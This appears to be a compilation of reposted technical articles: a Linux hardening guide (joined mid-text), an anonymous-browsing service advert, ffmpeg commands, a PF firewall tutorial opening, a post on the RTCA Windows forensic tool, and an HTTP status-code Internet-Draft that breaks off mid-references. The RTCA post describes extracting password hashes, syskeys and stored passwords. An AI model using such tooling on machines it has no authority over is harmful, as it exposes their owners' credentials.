intrusions. Running system updates with the package management tool, using "apt-get update && apt-get upgrade" (for Debian and Ubuntu Systems) or "yum update" (for CentOS and Fedora systems) is simple and straightforward. This practice ensures that if your distribution maintains active security updates, your system will be guarded against many security holes in commonly used software packages. System update tools will, however, not keep software up to date that you've installed outside of package management. This includes software that you've compiled and installed "by hand" (e.g. with "./configure && make && make install") and web-based applications that you've installed from a software developer's site, as is often the case with applications like WordPress and Drupal. Also excluded from protection will be libraries and packages you've installed with supplementary package management tools like Ruby's Gems, Perl's CPAN tool, Python easy_install, and Haskell Cabal. You will have to manage the process of keeping these files up to date yourself. The method you use to make sure that your entire system is kept up to date is a matter of personal preference, and depends on the nature of your workflow. We would recommend trying very hard to use the versions of software provided by your operating system or other programming platform-specific package management tools. If you must install from "source," we would recommend that you save the tarballs and source files for all such software in /src/ or ~/src/ so that you can keep track of what software you've installed in this manner. Often, you can remove a manually compiled application by issuing "make uninstall" in the source repository (directory). Additionally, it may be helpful to maintain a list of manually installed software, with version numbers and download locations. You may also want to investigate packaging your own software so that you can install it with apt, yum or pacman. Because of the complexity of maintaining software outside of the system's package management tools we strongly recommend avoiding manually installing software unless absolutely necessary. Your choice in a Linux distribution should be heavily biased by the availability of software in that distro's repositories for the systems you need to run on your server. Disable Unused Services One common avenue for attack involves exploiting unused applications. In general we recommend disabling daemons (services) that you're not actively using, developing, or testing. Using "/etc/init.d/[service] stop" or "/etc/rc.d/[service] stop", depending on your distribution, to deactivate unused services can prevent these services from being exploited later. Please note that services that are configured to start at system boot will run again should you reboot your server, so it may be safer to disable them from automatically starting using your distribution's particular method for doing so. Not only will unused services no longer consume system resources, if there are any security vulnerabilities in these services, would-be attackers will be unable to exploit them. Any service that you're not using should be turned off. To see what processes you're currently running, we recommend using the htop tool. Install with "apt-get install htop", "yum install htop" or "pacman -Sy htop". Lock Down SSH SSH, the secure shell service, is the main avenue we use to interact with servers remotely. While SSH provides exceptional encryption and security for users, it also provides a great deal of access to your server and thus represents an appealing target for an attacker. To counteract the possibility of having your servers compromised with an SSH attack, we recommend taking the following steps. First, disable root logins via SSH. Since the root username is predictable and provides complete access to your system, providing unfettered access to this account over SSH is unwise. Edit the /etc/ssh/sshd_config file to modify the PermitRootLogin option as follows: PermitRootLogin no If you need to gain root access to your system you can (and should) use tools like su and sudo to do so without logging in as root. Second, disable password authentication. Generate and use SSH keys to log into your system. Without passwords enabled, attackers will need to guess (or steal) your SSH private key in order to gain access to your server. In the file "/etc/ssh/sshd_config", modify PasswordAuthentication as follows: PasswordAuthentication no If you do not have SSH keys generated you will have to generate them on your own machine before disabling password authentication. To generate SSH keys for your host, issue the following command on your local system if you're using Mac OS X or Linux locally: ssh-keygen Answer the program's inquiries; generally the defaults are acceptable. This will generate an SSH key using the RSA algorithm. If you want to use the DSA algorithm, append "-t dsa" to the command. Your SSH key will be generated with the private key in ~/.ssh/id_rsa and the public key in ~/.ssh/id_rsa.pub. You will want to copy the public key into the ~/.ssh/authorized_keys file on the remote machine, using the following commands (replacing your own SSH user and host names). scp ~/.ssh/id_rsa.pub user@hostname.com:/home/user/.ssh/uploaded_key.pub ssh user@hostname.com "cat ~/.ssh/uploaded_key.pub >> ~/.ssh/authorized_keys" If you're using PuTTY in Windows, note that it has the ability to generate keys using puttygen that you can upload to your server. You can download puttygen from the PuTTY Homepage. If you have a problem logging in you will need physical access or out-of-band console access to your server to restore SSH functionally. You can use the Linode shell (LISH) to access your server's console. Limit Root and System Users' Access In general, users and applications that do not have access to a system on your server, either by virtue of limited access rules or by limited abilities to log into the system, cannot do any harm to the system. Additionally, one common way of compromising a system is to trick the system into thinking that a user has access rights greater than what they actually have. While these "escalation attacks" are relatively uncommon and are often patched rather quickly, they are only a threat when there are accounts that can be exploited. To address these possible threats we suggest the following best practices with regards to managing your user accounts: Don't give people user accounts if they don't need them. There are often ways to provide access to specific servers without giving users accounts with even limited access to the system. Giving someone a shell account on your system should be seen as a last resort in most cases. If you need to have multiple administrators for a system, rather than share a single root password among many people, use sudo to give "root access" but force users to authenticate with their own password. The sudo command also provides more detailed logging, so you know which root commands were issued by which user. Leverage user groups and permissions to provide granular access control when you have no option but to give a user an account on your system. Disable unused system user accounts, either by removing the account outright with the userdel command, or by locking the user account with "usermod --lock LOGIN-NAME" until the user needs access again (achieved with "usermod --unlock"). Limiting access to your servers and adhering to best practices with regards to administrative access and user account management won't guard against escalation attacks or all possible intrusions. However, by limiting the size of your "shadow" you decrease the likelihood of becoming the victim of many kinds of attacks. Use a Firewall to Block Unwanted Traffic As the term "firewall" has fallen into common non-technical usage, the specific role of a firewall solution as part of a larger security plan has become somewhat unclear. Firewalls are simple traffic filters that can be used to limit and constrain inbound traffic to your Linode. The aim is to prevent all traffic arriving from certain IP addresses or over certain ports in situations where you know that traffic is unwanted or malicious. On the whole, firewall settings and configurations are beyond the scope of this document. We recommend that you review specific guides for firewall configuration to learn how to configure your firewall correctly for your use. In this section, we hope to explain some basic firewall settings that you can use to prevent most intrusions. Although there are numerous packages on Linux systems that enable efficient and effective configuration of firewalls, the actual firewalls are created using iptables. This uses the packet filtering capabilities of the Linux kernel itself. This means that the firewall rules are enforced very efficiently. Nevertheless, the firewall that you configure can be as open or as restrictive as you need. It's sometimes difficult to decide what the best strategy is for deploying an effective firewall. With the understanding that your firewall setup needs must take the actual uses of your server and its users into account, we offer the following list as potential strategies for deploying a firewall. Identify the services that you're using and close all ports on all public IP addresses, except the ones that the services you use listen on. The most common standard ports include: web servers on port 80, ssh on port 22, smtp on port 25. If there are any security vulnerabilities for software running on other ports or intruders are scanning for open ports, the firewall will reject this traffic before it can invade your system. Disadvantages: This filter can be confusing if your suite of services change regularly, and you may end up unintentionally locking yourself out of services that you want to use, which can be hard to troubleshoot. Watch access logs for suspicious behavior and block inbound traffic from IPs and IP ranges that are attacking your server. If you're getting malicious activity from a specific IP address, then it's probably safe to block all traffic from that IP, at least for a while. Disadvantages: People can change their IP addresses to get around these rules, and blocking individual addresses from accessing your server can't prevent attacks before they happen. Block inbound traffic on sensitive ports, except from IP addresses that you know are good. Some services, like SSH, can grant an attacker a great deal of access to the system, while HTTP servers like Apache are designed to be accessed by the public at large. This is a "whitelisting" strategy and can be used to effectively secure services like SSH and database servers that are accessed over a private network. If you know where "good" traffic is likely to originate from, you can prevent would be attackers from gaining access to your machines without hindering the good traffic. Disadvantages: This strategy is only effective if you have a limited number of "good" sources of traffic, and is ineffective at securing services that need to be publicly accessible. These rules can -- and perhaps should -- be deployed to varying degrees as part of a larger security strategy. Firewalls alone don't prevent malicious behavior and are not a security cure-all, but they can be quite effective at preventing some attacks. When deciding to deploy firewall rules, the decision often comes down to the following questions: "will this rule impede traffic that actually want to service?", "will this rule make it more difficult to use the server as I want to?", and finally "will this rule successfully block traffic that I don't want to serve?" The answers to these questions often vary in response to the services you're providing and the way you use your server, but we hope that the above guidelines provide a productive starting point for your firewall deployment. Use Denyhosts or Fail2Ban to Prevent Password Attacks The DenyHosts and Fail2Ban applications (for which packages should be included in your distribution's software repository) help prevent dictionary attacks on your server. The basic concept is simple: these programs watch for attempted logins, and if your server is receiving multiple failed login attempts from the same IP address, these applications will insert firewall rules that will block traffic from the attacker's IP address. The assumption is that "good" users are very likely to be able to get their password correct in less than 3-5 attempts, and that anyone who submits an incorrect password more than 3-5 times is trying to break into a system. While there is the potential for false positives, the "bans" can be temporary, and are easily reversed by the administrator if necessary. The number of allowed attempts and the length of time the resulting ban remains in effect are configurable by the system administrator. Attempted logins can be monitored on a variety of protocols, including HTTP Auth, SMTP, and SSH. While this approach to restricting traffic won't prevent a compromised password from being used to break into a system, it can reduce the risk that a system user's weak password poses to the server as a whole. Encrypt Sensitive Data If most "best security practices" come down to exercising a fair bit of paranoia over your data and systems, then implementing data encryption represents the most severe expression of this paranoia. Well tuned access control lists are often quite effective at preventing most casual abuse, and there is always some resource overhead for encrypting and decrypting data. Nevertheless, if you're storing truly sensitive data, it's often quite prudent to encrypt it. There are a number of different options for accomplishing this goal. First, encrypt individual files using PGP and the tools provided by the GNU Privacy Gaurd package in your distribution (frequently, as "gpg"). PGP is very secure, and if you already use PGP keys and have a small number of sensitive files, this can be quite workable. This prevents casual snoopers from reading the contents of a file, even if they have read access to it, though it only works on a file-by-file basis. Additionally, it can sometimes be confusing to make sure you're encrypting data with the proper public key. The second option is more advanced. It requires running your own kernel under PV-GRUB, and using the dm-crypt kernel module to encrypt the contents of the disks. This takes a toll on disk performance, and requires you to enter a password on boot in order to access your files. The disadvantages are plenty: you are responsible for maintaining an up-to-date kernel, and if you lose your password all your files will be unrecoverable. Additionally, disk-level encryption protects against a very narrow set of threats: against physical attacks against the hardware and against unforeseen (and unlikely) issues with the virtualization engine in use. Once a machine with disk-level encryption is booted and running -- aside from the slight performance hit -- it is indistinguishable from an unencrypted system in terms of user experience. The final option, and perhaps the best middle ground, is to use a system like "EncFS" which creates an encrypted filesystem in user-space (using the FUSE interface). This system writes your files in an encrypted format to the disk, and when you mount the filesystem you're provided with a usable and unencrypted view of it. When you unmount the file system, you only have encrypted files. EncFS doesn't protect meta-data information like file size, permissions, and last-edited time, but is otherwise very secure. For sensitive files, this prevents the additional complexity of managing individual encrypted files, while still allowing for high quality data security. Again, from a holistic perspective, encrypting in this manner provides minimal benefit for most use cases and comes with a great deal of overhead. Nevertheless, there are some situations where encryption makes a lot of sense, particularly when you're managing very sensitive data on networked machines. Consider encryption as a possible tool among many options for creating a more secure environment. Best Practices with Databases One common class of security issues involves the applications that you develop and run on your server, as opposed to all of the system software that your application depends upon. There are some basic guidelines that you may want to follow as you develop applications. Distrust all inputs by sanitizing all text and content that users could put into the system. Most programming languages have "string scrubber" tools that you can use to strip out all code, scripts, and unwanted HTML tags. Use these to prevent anyone from using your site to publish malicious code, or use code to exploit your server. If your application is written in Perl, consider enabling warnings and "taint mode" by starting your program with "#!/usr/bin/perl -tw". Taint mode requires all input from external sources be tested with a regular expression before it may be used in your program. This means you won't accidentally use an untrusted input without (hopefully) running a sane regular expression check on it to make sure it contains only valid data. If your application is written in PHP, consider using the mysql_real_escape_string and htmlentities functions to sanitize user input such as GET and POST data. Using the above "string scrubbers" are a great way to begin securing your PHP code. You can find more information and examples on the mysql_real_escape_string and htmlentities manual pages. Sanitize database inputs to prevent SQL injection attacks when using a database system. One typical approach involves using prepared statements with the database interface. This prevents your database from generating unexpected output, and makes it impossible for users to perform unintended modification to your database or to access unauthorized content from your system. Authenticate all requests for secure information, rather than passing or storing IsAuthenticated or IsPrivileged status to the user. In short, avoid storing any information in cookies or in the HTTP query string that you don't want the users to be able to edit. These tips for coding practices, and indeed all of the security tips that we present here, are simply a starting place for ensuring that your system remains protected against intrusions from malicious users. Nevertheless, from our experience even these small suggestions will help keep your system secure from many common exploits. We hope that this guide has presented a number of manageable approaches that you can deploy in order to help ensure that your system remains secure. Sursa: Linux Security Basics

TUS - The Untraceable Surfer We provide a platform for true anonymous, safe and unrestricted web surfing. The internet is a public network where eavesdropping is made very easy. Also internet service providers, workplaces and governments may restrict and monitor internet usage. By surfing the internet on our terminal servers all these privacy concerns and restrictions are gone. Download: https://www.tusurfer.com/tus/download.do Dear User, On the behalf of the TUS team I welcome you to our website. The TUS website allows and enables citizens of any country to be able to freely and safely access any information on the internet. And the reason this website was created? The idea was born while I was living in a communist country. Although later I moved to Canada (one of the best countries in the world) I have not forgotten my roots. Please enjoy our services and help us make them better by giving us your invaluable feedback. Also if you have any suggestion, concern or question we would love to hear from you. Kindest regards, Nigel Fox Info: https://www.tusurfer.com/tus/index.jsp

19 ffmpeg commands for all needs ffmpeg is a multiplatform, open-source library for video and audio files. I have compiled 19 useful and amazing commands covering almost all needs: video conversion, sound extraction, encoding file for iPod or PSP, and more. Getting infos from a video file ffmpeg -i video.avi Turn X images to a video sequence ffmpeg -f image2 -i image%d.jpg video.mpg This command will transform all the images from the current directory (named image1.jpg, image2.jpg, etc…) to a video file named video.mpg. Turn a video to X images ffmpeg -i video.mpg image%d.jpg This command will generate the files named image1.jpg, image2.jpg, … The following image formats are also availables : PGM, PPM, PAM, PGMYUV, JPEG, GIF, PNG, TIFF, SGI. Encode a video sequence for the iPpod/iPhone ffmpeg -i source_video.avi input -acodec aac -ab 128kb -vcodec mpeg4 -b 1200kb -mbd 2 -flags +4mv+trell -aic 2 -cmp 2 -subcmp 2 -s 320x180 -title X final_video.mp4 Explanations : Source : source_video.avi Audio codec : aac Audio bitrate : 128kb/s Video codec : mpeg4 Video bitrate : 1200kb/s Video size : 320px par 180px Generated video : final_video.mp4 Encode video for the PSP ffmpeg -i source_video.avi -b 300 -s 320x240 -vcodec xvid -ab 32 -ar 24000 -acodec aac final_video.mp4 Explanations : Source : source_video.avi Audio codec : aac Audio bitrate : 32kb/s Video codec : xvid Video bitrate : 1200kb/s Video size : 320px par 180px Generated video : final_video.mp4 Extracting sound from a video, and save it as Mp3 ffmpeg -i source_video.avi -vn -ar 44100 -ac 2 -ab 192 -f mp3 sound.mp3 Explanations : Source video : source_video.avi Audio bitrate : 192kb/s output format : mp3 Generated sound : sound.mp3 Convert a wav file to Mp3 ffmpeg -i son_origine.avi -vn -ar 44100 -ac 2 -ab 192 -f mp3 son_final.mp3 Convert .avi video to .mpg ffmpeg -i video_origine.avi video_finale.mpg Convert .mpg to .avi ffmpeg -i video_origine.mpg video_finale.avi Convert .avi to animated gif(uncompressed) ffmpeg -i video_origine.avi gif_anime.gif Mix a video with a sound file f fmpeg -i son.wav -i video_origine.avi video_finale.mpg Convert .avi to .flv ffmpeg -i video_origine.avi -ab 56 -ar 44100 -b 200 -r 15 -s 320x240 -f flv video_finale.flv Convert .avi to dv f fmpeg -i video_origine.avi -s pal -r pal -aspect 4:3 -ar 48000 -ac 2 video_finale.dv Or: ffmpeg -i video_origine.avi -target pal-dv video_finale.dv Convert .avi to mpeg for dvd players ffmpeg -i source_video.avi -target pal-dvd -ps 2000000000 -aspect 16:9 finale_video.mpeg Explanations : target pal-dvd : Output format ps 2000000000 maximum size for the output file, in bits (here, 2 Gb) aspect 16:9 : Widescreen Compress .avi to divx ffmpeg -i video_origine.avi -s 320x240 -vcodec msmpeg4v2 video_finale.avi Compress Ogg Theora to Mpeg dvd ffmpeg -i film_sortie_cinelerra.ogm -s 720x576 -vcodec mpeg2video -acodec mp3 film_terminée.mpg Compress .avi to SVCD mpeg2 NTSC format: ffmpeg -i video_origine.avi -target ntsc-svcd video_finale.mpg PAL format: ffmpeg -i video_origine.avi -target pal-svcd video_finale.mpg Compress .avi to VCD mpeg2 NTSC format: ffmpeg -i video_origine.avi -target ntsc-vcd video_finale.mpg PAL format: ffmpeg -i video_origine.avi -target pal-vcd video_finale.mpg Multi-pass encoding with ffmpeg ffmpeg -i fichierentree -pass 2 -passlogfile ffmpeg2pass fichiersortie-2 This article is an English adaptation of Jean Cartier ffmpeg exemples. Sursa: http://www.catswhocode.com/blog/19-ffmpeg-commands-for-all-needs

Firewalling with OpenBSD's PF packet filter Peter N. M. Hansteen <peter _@_ bsdly.net> Copyright 2005 - 2011 Peter N. M. Hansteen Table of Contents Before we start PF? Packet filter? Firewall? NAT? PF today BSD vs Linux - Configuration Simplest possible setup (OpenBSD) Simplest possible setup (FreeBSD) Simplest possible setup (NetBSD) First rule set - single machine Slightly stricter Statistics from pfctl A simple gateway, NAT if you need it Gateways and the pitfalls of in, out and on What is your local network, anyway? Setting up That sad old FTP thing If We Have To: ftp-proxy With Redirection Historical FTP proxies: do not use Ancient FTP through NAT: ftp-proxy Ancient: FTP, PF and routable addresses: ftpsesame, pftpx and ftp-proxy! ftp-proxy, slightly new style Making your network troubleshooting friendly Then, do we let it all through? The easy way out: The buck stops here Letting ping through Helping traceroute Path MTU discovery Network hygiene: Blocking, scrubbing and so on block-policy scrub antispoof Handling non-routable addresses from elsewhere A web server and a mail server on the inside Taking care of your own - the inside Tables make your life easier Logging Taking a peek with tcpdump Other log tools you may want to look into But there are limits (an anecdote) Keeping an eye on things with systat Keeping an eye on things with pftop Invisible gateway - bridge Directing traffic with ALTQ ALTQ - prioritizing by traffic type So why does this work? Using a match Rule for Queue Assignment ALTQ - allocation by percentage ALTQ - handling unwanted traffic CARP and pfsync Wireless networks made simple A little IEEE 802.11 background WEP (Wired Equivalent Privacy) WPA (WiFi Protected Access) Setting up a simple wireless network An open, yet tightly guarded wireless network with authpf Turning away the brutes expiring table entries with pfctl Using expiretable to tidy your tables Giving spammers a hard time Remember, you are not alone: blacklisting List of black and grey, and the sticky tarpit Setting up spamd Some early highlights of our spamd experience Beating'em up some more: spamdb and greytrapping Enter greytrapping Your own traplist Deleting, handling trapped entries The downside: some people really do not get it Conclusions from our spamd experience PF - Haiku References Where to find the tutorial on the web If you enjoyed this: Buy OpenBSD CDs and other items, donate! Before we start This lecture[1] will be about firewalls and related functions, starting from a little theory along with a number of examples of filtering and other network traffic directing. As in any number of other endeavors, the things I discuss can be done in more than one way. More information: The Book of PF, training, consulting Most of the topics we touch on here is covered in more detail in The Book of PF, which was written by the same author and published by No Starch Press at the end of 2007, with a revised and updated second edition published in November 2010. The book is an expanded and extensively rewritten followup to this tutorial, and covers a range of advanced topics in addition to those covered here. This tutorial is in minimal-maintainence mode, in that I'll occasionally make an effort to keep the information in it up to date, but it will not expand in scope. For more in-depth information or topics not covered here, check the book, the PF User Guide (also known as The PF FAQ) or the relevant man pages. If you buy the book via The OpenBSD Bookstore, the OpenBSD project gets a slightly larger a cut. If you need PF related consulting or training, please contact me for further details. You may want to read my Rent-a-geek writeup too. Under any circumstances I will urge you to interrupt me when you need to. That is, if you will permit me to use what I learn from your comments later, either in revised versions of this lecture or in practice at a later time. PF? What, then is PF? Let us start by looking briefly at the project's history to put things in their proper context. OpenBSD's Packet Filter subsystem, which most people refer to simply by using the abbreviated form 'PF', was originally written in an effort of extremely rapid development during the northern hemisphere summer and autumn months of 2001 by Daniel Hartmeier and a number of OpenBSD developers, and was launched as a default part of the OpenBSD 3.0 base system in December of 2001. The need for a new firewalling software subsystem for OpenBSD arose when Darren Reed announced to the world that IPFilter, which at that point had been rather intimately integrated in OpenBSD, was not after all BSD licensed. In fact quite to the contrary. The license itself was almost a word by word copy of the BSD license, omitting only the right to make changes to the code and distribute the result. The OpenBSD version of IPFilter contained quite a number of changes and customizations, which it turned out were not allowed according to the license. IPFilter was removed from the OpenBSD source tree on May 29th, 2001, and for a few weeks OpenBSD-current did not contain any firewalling software. Fortunately, in Switzerland Daniel Hartmeier was already doing some limited experiments involving kernel hacking in the networking code. His starting point was hooking a small function of his own into the networking stack, making packets pass through it, and after a while he had started thinking about filtering. Then the license crisis happened. IPFilter was pruned from the source tree on May 29th. The first commit of the PF code happened Sunday, June 24 2001 at 19:48:58 UTC.[2] A few months of rather intense activity followed, and the version of PF to be released with OpenBSD 3.0 contained a rather complete implementation of packet filtering, including network address translation. From the looks of it, Daniel Hartmeier and the other PF developers made good use of their experience with the IPFilter code. Under any circumstances Daniel presented a USENIX 2002 paper with performance tests which show that the OpenBSD 3.1 PF performed equally well as or better under stress than IPFilter on the same platform or iptables on Linux. In addition, some tests were run on the original PF from OpenBSD 3.0. These tests showed mainly that the code had gained in efficiency from version 3.0 to version 3.1. The article which provides the details is available from Daniel Hartmeier's web, see http://www.benzedrine.cx/pf-paper.html. I have not seen comparable tests performed recently, but in my own experience and that of others, the PF filtering overhead is pretty much negligible. As one data point, the machine which gateways between one of the networks where I've done a bit of work and the world is a Pentium III 450MHz with 384MB of RAM. When I've remembered to check, I've never seen the machine at less than 96 percent 'idle' according to top. It is however worth noting that various optimisations have been introduced to OpenBSD's PF code during recent releases (mainly by the current main PF developers Henning Brauer and Ryan McBride with contributions from others), making each release from 4.4 through 4.9 perform better than its predecessors. ................................................................. Online: http://home.nuug.no/~peter/pf/en/long-firewall.html

RTCA : Portable Windows forensic analysis tool OCTOBER 20, 2011 13:13 PM - 0 COMMENTS by BLACK on OCTOBER 20, 2011 RTCA is a Windows forensic analysis tool, registry, audit logs and files. RTCA basically is a standalone and portable application for extraction and analysis investigation, can be used in local configuration report or analysis after extraction. As it analysis after extraction analysis is fast and acurate. Features of RTCA Compatible with Windows XP, Vista, 2003, 2008, 7, 8 32-bit (64-bit version will be compiled) and 90% ok under Wine. Can be run in command line. Processing and copies of registry files (damaged registry too). System information: bootKeys/syskey, security features, serials MS… Applications, updates, list of services, drivers, and USB… UserAssist (command history performed by each user). Applications at startup. Network configuration, wireless and SSID. List of accounts, users and hash passwords. Passwords stored in the registry (eg VNC). Most Recent Used historical paths. Registry Viewer Lite. Processing of local logs file, evt (Windows= Vista) and log ( format linux / unix). file system extraction (file and directory) : acls, hidden and protected system state. Files explorer lite. Processes and associated network ports. Synthesis (audit logs, file and registry) sort by date. Export / Import results in CSV, HTML and XML. Download: http://omnia-projetcs.googlecode.com/svn/trunk/RTCA/RtCA.exe Sursa: http://www.pentestit.com/rtca-portable-windows-forensic-analysis-tool/

Internet-Draft - Additional HTTP Status Codes Table of Contents 1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . . 3 2. Requirements . . . . . . . . . . . . . . . . . . . . . . . . . 3 3. 428 Precondition Required . . . . . . . . . . . . . . . . . . . 3 4. 429 Too Many Requests . . . . . . . . . . . . . . . . . . . . . 4 5. 431 Request Header Fields Too Large . . . . . . . . . . . . . . 4 6. 511 Network Authentication Required . . . . . . . . . . . . . . 5 7. Security Considerations . . . . . . . . . . . . . . . . . . . . 6 8. IANA Considerations . . . . . . . . . . . . . . . . . . . . . . 7 9. References . . . . . . . . . . . . . . . . . . . . . . . . . . 7 9.1. Normative References . . . . . . . . . . . . . . . . . . . 7 9.2. Informative References . . . . . . . . . . . . . . . . . . 8 Appendix A. Acknowledgements . . . . . . . . . . . . . . . . . . . 8 Appendix B. Issues Raised by Captive Portals . . . . . . . . . . . 8 Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . . 9 Introduction This document specifies additional HTTP [RFC2616] status codes for a variety of common situations, to improve interoperability and avoid confusion when other, less precise status codes are used. Feedback should occur on the ietf-http-wg@w3.org mailing list, although this draft is NOT a work item of the IETF HTTPbis Working Group. Document: [Docs] [txt|pdf] [Tracker] [Email] [Diff1] [Diff2] [Nits] Versions: 00 01 02 Network Working Group M. Nottingham Internet-Draft Rackspace Updates: 2616 (if approved) R. Fielding Intended status: Standards Track Adobe Expires: April 20, 2012 October 18, 2011 Additional HTTP Status Codes draft-nottingham-http-new-status-02 Abstract This document specifies additional HyperText Transfer Protocol (HTTP) status codes for a variety of common situations. Status of this Memo This Internet-Draft is submitted in full conformance with the provisions of BCP 78 and BCP 79. Internet-Drafts are working documents of the Internet Engineering Task Force (IETF). Note that other groups may also distribute working documents as Internet-Drafts. The list of current Internet- Drafts is at http://datatracker.ietf.org/drafts/current/. Internet-Drafts are draft documents valid for a maximum of six months and may be updated, replaced, or obsoleted by other documents at any time. It is inappropriate to use Internet-Drafts as reference material or to cite them other than as "work in progress." This Internet-Draft will expire on April 20, 2012. Copyright Notice Copyright (c) 2011 IETF Trust and the persons identified as the document authors. All rights reserved. This document is subject to BCP 78 and the IETF Trust's Legal Provisions Relating to IETF Documents (http://trustee.ietf.org/license-info) in effect on the date of publication of this document. Please review these documents carefully, as they describe your rights and restrictions with respect to this document. Code Components extracted from this document must include Simplified BSD License text as described in Section 4.e of the Trust Legal Provisions and are provided without warranty as described in the Simplified BSD License. Nottingham & Fielding Expires April 20, 2012 [Page 1] Internet-Draft Additional HTTP Status Codes October 2011 Table of Contents 1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . . 3 2. Requirements . . . . . . . . . . . . . . . . . . . . . . . . . 3 3. 428 Precondition Required . . . . . . . . . . . . . . . . . . . 3 4. 429 Too Many Requests . . . . . . . . . . . . . . . . . . . . . 4 5. 431 Request Header Fields Too Large . . . . . . . . . . . . . . 4 6. 511 Network Authentication Required . . . . . . . . . . . . . . 5 7. Security Considerations . . . . . . . . . . . . . . . . . . . . 6 8. IANA Considerations . . . . . . . . . . . . . . . . . . . . . . 7 9. References . . . . . . . . . . . . . . . . . . . . . . . . . . 7 9.1. Normative References . . . . . . . . . . . . . . . . . . . 7 9.2. Informative References . . . . . . . . . . . . . . . . . . 8 Appendix A. Acknowledgements . . . . . . . . . . . . . . . . . . . 8 Appendix B. Issues Raised by Captive Portals . . . . . . . . . . . 8 Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . . 9 Nottingham & Fielding Expires April 20, 2012 [Page 2] Internet-Draft Additional HTTP Status Codes October 2011 1. Introduction This document specifies additional HTTP [RFC2616] status codes for a variety of common situations, to improve interoperability and avoid confusion when other, less precise status codes are used. Feedback should occur on the ietf-http-wg@w3.org mailing list, although this draft is NOT a work item of the IETF HTTPbis Working Group. 2. Requirements The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in [RFC2119]. 3. 428 Precondition Required This status code indicates that the origin server requires the request to be conditional. Its typical use is to avoid the "lost update" problem, where a client GETs a resource's state, modifies it, and PUTs it back to the server, when meanwhile a third party has modified the state on the server, leading to a conflict. By requiring requests to be conditional, the server can assure that clients are working with the correct copies. Responses using this status code SHOULD explain how to resubmit the request successfully. For example: HTTP/1.1 428 Precondition Required Content-Type: text/html <html> <head> <title>Precondition Required</title> </head> <body> <h1>Precondition Required</h1> <p>This request is required to be conditional; try using "If-Match".</p> </body> </html> Responses with the 428 status code MUST NOT be stored by a cache. Nottingham & Fielding Expires April 20, 2012 [Page 3] Internet-Draft Additional HTTP Status Codes October 2011 4. 429 Too Many Requests This status code indicates that the user has sent too many requests in a given amount of time ("rate limiting"). The response representations SHOULD include details explaining the condition, and MAY include a Retry-After header indicating how long to wait before making a new request. For example: HTTP/1.1 429 Too Many Requests Content-Type: text/html Retry-After: 3600 <html> <head> <title>Too Many Requests</title> </head> <body> <h1>Too many Requests</h1> <p>I only allow 50 requests per hour to this Web site per logged in user. Try again soon.</p> </body> </html> Note that this specification does not define how the origin server identifies the user, nor how it counts requests. For example, an origin server that is limiting request rates can do so based upon counts of requests on a per-resource basis, across the entire server, or even among a set of servers. Likewise, it might identify the user by its authentication credentials, or a stateful cookie. Responses with the 429 status code MUST NOT be stored by a cache. 5. 431 Request Header Fields Too Large This status code indicates that the server is unwilling to process the request because its header fields are too large. The request MAY be resubmitted after reducing the size of the request header fields. It can be used both when the set of request header fields in total are too large, and when a single header field is at fault. In the latter case, the response representation SHOULD specify which header field was too large. For example: Nottingham & Fielding Expires April 20, 2012 [Page 4] Internet-Draft Additional HTTP Status Codes October 2011 HTTP/1.1 431 Request Header Fields Too Large Content-Type: text/html <html> <head> <title>Request Header Fields Too Large</title> </head> <body> <h1>Request Header Fields Too Large</h1> <p>The "Example" header was too large.</p> </body> </html> Responses with the 431 status code MUST NOT be stored by a cache. 6. 511 Network Authentication Required This status code indicates that the client needs to authenticate to gain network access. The response representation SHOULD indicate how to do this; e.g., with an HTML form for submitting credentials. The 511 status SHOULD NOT be generated by origin servers; it is intended for use by intercepting proxies that are interposed as a means of controlling access to the network. Responses with the 511 status code MUST NOT be stored by a cache. 6.1. The 511 Status Code and Captive Portals A network operator wishing to require some authentication, acceptance of terms or other user interaction before granting access usually does so by identify clients who have not done so ("unknown clients") using their MAC addresses. Unknown clients then have all traffic blocked, except for that on TCP port 80, which is sent to a HTTP server (the "login server") dedicated to "logging in" unknown clients, and of course traffic to the login server itself. For example, a user agent might connect to a network and make the following HTTP request on TCP port 80: GET /index.htm HTTP/1.1 Host: www.example.com Nottingham & Fielding Expires April 20, 2012 [Page 5] Internet-Draft Additional HTTP Status Codes October 2011 Upon receiving such a request, the login server would generate a 511 response: HTTP/1.1 511 Network Authentication Required Refresh: 0; url=https://login.example.net/ Content-Type: text/html <html> <head> <title>Network Authentication Required</title> </head> <body> <p>You need to <a href="https://login.example.net/"> authenticate with the local network</a> in order to get access.</p> </body> </html> Here, the 511 status code assures that non-browser clients will not interpret the response as being from the origin server, and the Refresh header redirects the user agent to the login server (an HTML META element can be used for this as well). Note that the 511 response can itself contain the login interface, but it may not be desirable to do so, because browsers would show the login interface as being associated with the originally requested URL, which may cause confusion. 7. Security Considerations 7.1. 428 Precondition Required The 428 status code is optional; clients cannot rely upon its use to prevent "lost update" conflicts. 7.2. 429 Too Many Requests Servers are not required to use the 429 status code; when limiting resource usage, it may be more appropriate to just drop connections, or take other steps. 7.3. 431 Request Header Fields Too Large Servers are not required to use the 431 status code; when under attack, it may be more appropriate to just drop connections, or take other steps. Nottingham & Fielding Expires April 20, 2012 [Page 6] Internet-Draft Additional HTTP Status Codes October 2011 7.4. 511 Network Authentication Required In common use, a response carrying the 511 status code will not come from the origin server indicated in the request's URL. This presents many security issues; e.g., an attacking intermediary may be inserting cookies into the original domain's name space, may be observing cookies or HTTP authentication credentials sent from the user agent, and so on. However, these risks are not unique to the 511 status code; in other words, a captive portal that is not using this status code introduces the same issues. 8. IANA Considerations The HTTP Status Codes Registry should be updated with the following entries: o Code: 428 o Description: Precondition Required o Specification: [ this document ] o Code: 429 o Description: Too Many Requests o Specification: [ this document ] o Code: 431 o Description: Request Header Fields Too Large o Specification: [ this document ] o Code: 511 o Description: Network Authentication Required o Specification: [ this document ] 9. References 9.1. Normative References [RFC2119] Bradner, S., "Key words for use in RFCs to Indicate Requirement Levels", BCP 14, RFC 2119, March 1997. [RFC2616] Fielding, R., Gettys, J., Mogul, J., Frystyk, H., Masinter, L., Leach, P., and T. Berners-Lee, "Hypertext Transfer Protocol -- HTTP/1.1", RFC 2616, June 1999. Nottingham & Fielding Expires April 20, 2012 [Page 7] Internet-Draft Additional HTTP Status Codes October 2011 9.2. Informative References [RFC4791] 